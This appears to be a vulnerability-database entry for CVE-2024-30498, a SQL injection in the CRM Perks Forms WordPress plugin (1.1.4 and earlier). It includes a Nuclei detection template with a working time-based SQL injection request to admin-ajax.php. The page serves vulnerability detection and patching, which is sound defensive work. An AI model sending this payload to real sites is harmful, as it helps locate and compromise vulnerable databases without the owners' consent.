CRM Perks Forms <= 1.1.4 - SQL Injection
CVE-2024-30498
Verified
Description
CRM Perks CRM Perks Forms (affected versions 1.1.4 and earlier) contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL commands, exploit requires user interaction.
Severity
Critical
CVSS Score
9.3
Exploit Probability
2%
Published Date
March 8, 2026
Template Author
shivam kamboj
CVE-2024-30498.yaml
id: CVE-2024-30498
info:
name: CRM Perks Forms <= 1.1.4 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
CRM Perks CRM Perks Forms (affected versions 1.1.4 and earlier) contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL commands, exploit requires user interaction.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
remediation: |
Update to the latest version of CRM Perks Forms, version 1.1.5 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/crm-perks-forms/crm-perks-forms-114-unauthenticated-sql-injection
- https://patchstack.com/database/wordpress/plugin/crm-perks-forms/vulnerability/wordpress-crm-perks-forms-plugin-1-1-4-unauthenticated-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2024-30498
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2024-30498
epss-score: 0.02267
epss-percentile: 0.80895
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,crm-perks-forms
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=post_cfx_form&form_id=1%27OR(EXP(~(SELECT*FROM(SELECT(SLEEP(8)))a)))OR%27&vx_is_ajax=1&fixed[test]=a
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "\"status\":\"ok\"")'
condition: and
# digest: 4a0a00473045022026196ea399699ec6fc30b34ff873e6d265a02fde9e4d55be79cdd0ca8838bdcc022100f9463208b77f462a9e0bc766f51bc3d153966f6589eae2d86d3ddcef1aaf88df:922c64590222798bb761d5b6d8e729509.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
CVE ID:
cve-2024-30498
CWE ID:
cwe-89
References
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/crm-perks-forms/crm-perks-forms-114-unauthenticated-sql-injectionhttps://patchstack.com/database/wordpress/plugin/crm-perks-forms/vulnerability/wordpress-crm-perks-forms-plugin-1-1-4-unauthenticated-sql-injection-vulnerabilityhttps://nvd.nist.gov/vuln/detail/CVE-2024-30498
Remediation Steps
Update to the latest version of CRM Perks Forms, version 1.1.5 or later.